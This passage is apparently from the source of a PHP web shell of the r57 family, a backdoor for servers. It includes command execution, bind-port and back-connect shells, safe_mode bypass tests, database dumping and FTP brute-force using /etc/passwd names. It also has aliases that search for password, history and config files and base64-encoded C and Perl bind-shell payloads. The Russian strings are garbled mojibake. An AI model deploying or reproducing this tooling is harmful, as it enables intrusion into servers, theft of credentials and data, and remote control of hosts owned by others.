=>'اàمًَçèٍü', +'ru_text9' =>'خٍêًûٍèه ïîًٍà è ïًèâےçêà همî ê /bin/bash', +'ru_text10'=>'خٍêًûٍü ïîًٍ', +'ru_text11'=>'دàًîëü نëے نîٌٍَïà', +'ru_butt3' =>'خٍêًûٍü', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-àنًهٌ', +'ru_text14'=>'دîًٍ', +'ru_butt4' =>'آûïîëيèٍü', +'ru_text15'=>'اàمًَçêà ôàéëîâ ٌ َنàëهييîمî ٌهًâهًà', +'ru_text16'=>'بٌïîëüçîâàٍü', +'ru_text17'=>'سنàëهييûé ôàéë', +'ru_text18'=>'ثîêàëüيûé ôàéë', +'ru_text19'=>'Exploits', +'ru_text20'=>'بٌïîëüçîâàٍü', +'ru_text21'=>'حîâîه èىے', +'ru_text22'=>'datapipe', +'ru_text23'=>'ثîêàëüيûé ïîًٍ', +'ru_text24'=>'سنàëهييûé ُîٌٍ', +'ru_text25'=>'سنàëهييûé ïîًٍ', +'ru_text26'=>'بٌïîëüçîâàٍü', +'ru_butt5' =>'اàïٌٍَèٍü', +'ru_text28'=>'ذàلîٍà â safe_mode', +'ru_text29'=>'ؤîٌٍَï çàïًهùهي', +'ru_butt6' =>'رىهيèٍü', +'ru_text30'=>'دًîٌىîًٍ ôàéëà', +'ru_butt7' =>'آûâهٌٍè', +'ru_text31'=>'شàéë يه يàéنهي', +'ru_text32'=>'آûïîëيهيèه PHP êîنà', +'ru_text33'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé open_basedir ÷هًهç ôَيêِèè cURL', +'ru_butt8' =>'دًîâهًèٍü', +'ru_text34'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé safe_mode ÷هًهç ôَيêِè‏ include', +'ru_text35'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé safe_mode ÷هًهç çàمًَçêَ ôàéëà â mysql', +'ru_text36'=>'ءàçà', +'ru_text37'=>'ثîمèي', +'ru_text38'=>'دàًîëü', +'ru_text39'=>'زàلëèِà', +'ru_text40'=>'ؤàىï ٍàلëèِû لàçû نàييûُ', +'ru_butt9' =>'ؤàىï', +'ru_text41'=>'رîًُàيèٍü â ôàéëه', +'ru_text42'=>'ذهنàêٍèًîâàيèه ôàéëà', +'ru_text43'=>'ذهنàêٍèًîâàٍü ôàéë', +'ru_butt10'=>'رîًُàيèٍü', +'ru_butt11'=>'ذهنàêٍèًîâàٍü', +'ru_text44'=>'ذهنàêٍèًîâàيèه ôàéëà يهâîçىîويî! ؤîٌٍَï ٍîëüêî نëے ÷ٍهيèے!', +'ru_text45'=>'شàéë ٌîًُàيهي', +'ru_text46'=>'دًîٌىîًٍ phpinfo()', +'ru_text47'=>'دًîٌىîًٍ يàًٌٍîهê php.ini', +'ru_text48'=>'سنàëهيèه âًهىهييûُ ôàéëîâ', +'ru_text49'=>'سنàëهيèه ٌêًèïٍà ٌ ٌهًâهًà', +'ru_text50'=>'بيôîًىàِèے î ïًîِهٌٌîًه', +'ru_text51'=>'بيôîًىàِèے î ïàىےٍè', +'ru_text52'=>'زهêٌٍ نëے ïîèٌêà', +'ru_text53'=>'بٌêàٍü â ïàïêه', +'ru_text54'=>'دîèٌê ٍهêٌٍà â ôàéëàُ', +'ru_butt12'=>'حàéٍè', +'ru_text55'=>'زîëüêî â ôàéëàُ', +'ru_text56'=>'حè÷همî يه يàéنهيî', +'ru_text57'=>'رîçنàٍü/سنàëèٍü شàéë/ؤèًهêٍîًè‏', +'ru_text58'=>'بىے', +'ru_text59'=>'شàéë', +'ru_text60'=>'ؤèًهêٍîًè‏', +'ru_butt13'=>'رîçنàٍü/سنàëèٍü', +'ru_text61'=>'شàéë ٌîçنàي', +'ru_text62'=>'ؤèًهêٍîًèے ٌîçنàيà', +'ru_text63'=>'شàéë َنàëهي', +'ru_text64'=>'ؤèًهêٍîًèے َنàëهيà', +'ru_text65'=>'رîçنàٍü', +'ru_text66'=>'سنàëèٍü', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'تîىàينà', +'ru_text69'=>'دàًàىهًٍ1', +'ru_text70'=>'دàًàىهًٍ2', +'ru_text71'=>"آٍîًîé ïàًàىهًٍ êîىàينû:\r\n- نëے CHOWN - èىے يîâîمî ïîëüçîâàٍهëے èëè همî UID (÷èٌëîى) \r\n- نëے êîىàينû CHGRP - èىے مًَïïû èëè GID (÷èٌëîى) \r\n- نëے êîىàينû CHMOD - ِهëîه ÷èٌëî â âîٌüىهًè÷يîى ïًهنٌٍàâëهيèè (يàïًèىهً 0777)", +'ru_text72'=>'زهêٌٍ نëے ïîèٌêà', +'ru_text73'=>'بٌêàٍü â ïàïêه', +'ru_text74'=>'بٌêàٍü â ôàéëàُ', +'ru_text75'=>'* ىîويî èٌïîëüçîâàٍü ًهمَëےًيîه âûًàوهيèه', +'ru_text76'=>'دîèٌê ٍهêٌٍà â ôàéëàُ ٌ ïîىîùü‏ ٍَèëèٍû find', +'ru_text77'=>'دًîٌىîًٍ ًٌٍَêًٍَû لàçû نàييûُ', +'ru_text78'=>'دîêàçûâàٍü ٍàلëèِû', +'ru_text79'=>'دîêàçûâàٍü ٌٍîëلِû', +'ru_text80'=>'زèï', +'ru_text81'=>'رهٍü', +'ru_text82'=>'ءàçû نàييûُ', +'ru_text83'=>'آûïîëيهيèه SQL çàïًîٌà', +'ru_text84'=>'SQL çàïًîٌ', +'ru_text85'=>'دًîâهًêà âîçىîويîٌٍè îلُîنà îمًàيè÷هيèé safe_mode ÷هًهç âûïîëيهيèه êîىàين â MSSQL ٌهًâهًه', +'ru_text86'=>'رêà÷èâàيèه ôàéëà ٌ ٌهًâهًà', +'ru_butt14'=>'رêà÷àٍü', +'ru_text87'=>'اàمًَçêà ôàéëîâ ٌ َنàëهييîمî ftp-ٌهًâهًà', +'ru_text88'=>'FTP-ٌهًâهً:ïîًٍ', +'ru_text89'=>'شàéë يà ftp ٌهًâهًه', +'ru_text90'=>'ذهوèى ïهًهنà÷è', +'ru_text91'=>'ہًُèâèًîâàٍü â', +'ru_text92'=>'لهç àًُèâàِèè', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-لًٍَôîًٌ', +'ru_text95'=>'رïèٌîê ïîëüçîâàٍهëهé', +'ru_text96'=>'حه َنàëîٌü ïîëَ÷èٍü ٌïèٌîê ïîëüçîâàٍهëهé', +'ru_text97'=>'دًîâهًهيî êîىلèيàِèé: ', +'ru_text98'=>'سنà÷يûُ ïîنêë‏÷هيèé: ', +'ru_text99'=>'* â êà÷هٌٍâه ëîمèيà è ïàًîëے èٌïîëüçَهٌٍے èىے ïîëüçîâàٍهëے èç /etc/passwd', +'ru_text100'=>'خٍïًàâêà ôàéëîâ يà َنàëهييûé ôٍï ٌهًâهً', +'ru_text101'=>'بٌïîëüçîâàٍü ٍàêوه ïهًهâهًيٍَîه (user -> resu) èىے ïîëüçîâàٍهëے â êà÷هٌٍâه ïàًîëے', +'ru_text102'=>'دî÷ٍà', +'ru_text103'=>'خٍïًàâêà ïèٌüىà', +'ru_text104'=>'خٍïًàâêà ôàéëà يà ïî÷ٍîâûé ےùèê', +'ru_text105'=>'تîىَ', +'ru_text106'=>'خٍ', +'ru_text107'=>'زهىà', +'ru_butt15'=>'خٍïًàâèٍü', +'ru_text108'=>'زهêٌٍ ïèٌüىà', +'ru_text109'=>'رâهًيٍَü', +'ru_text110'=>'ذàçâهًيٍَü', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +); +/* +ہëèàٌû êîىàين +دîçâîëے‏ٍ èçلهوàٍü ىيîمîêًàٍيîمî يàلîًà îنيèُ è ٍهُ-وه êîىàين. ( رنهëàيî لëàمîنàًے ىîهé ïًèًîنيîé ëهيè ) +آû ىîوهٍه ٌàىè نîلàâëےٍü èëè èçىهيےٍü êîىàينû. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>è</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'خّèلêà! حه ىîمَ çàïèٌàٍü â ôàéë '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = 'خّèلêà! حه ىîمَ ïًî÷èٍàٍü ôàéë '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "حه َنàëîٌü ٌîçنàٍü "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('حه َنàëîٌü ïîنêë‏÷èٍüٌے ê ftp ٌهًâهًَ','خّèلêà àâٍîًèçàِèè يà ftp ٌهًâهًه','حه َنàëîٌü ïîىهيےٍü نèًهêٍîًè‏ يà ftp ٌهًâهًه'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('حه َنàëîٌü îٍïًàâèٍü ïèٌüىî','دèٌüىî îٍïًàâëهيî'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs 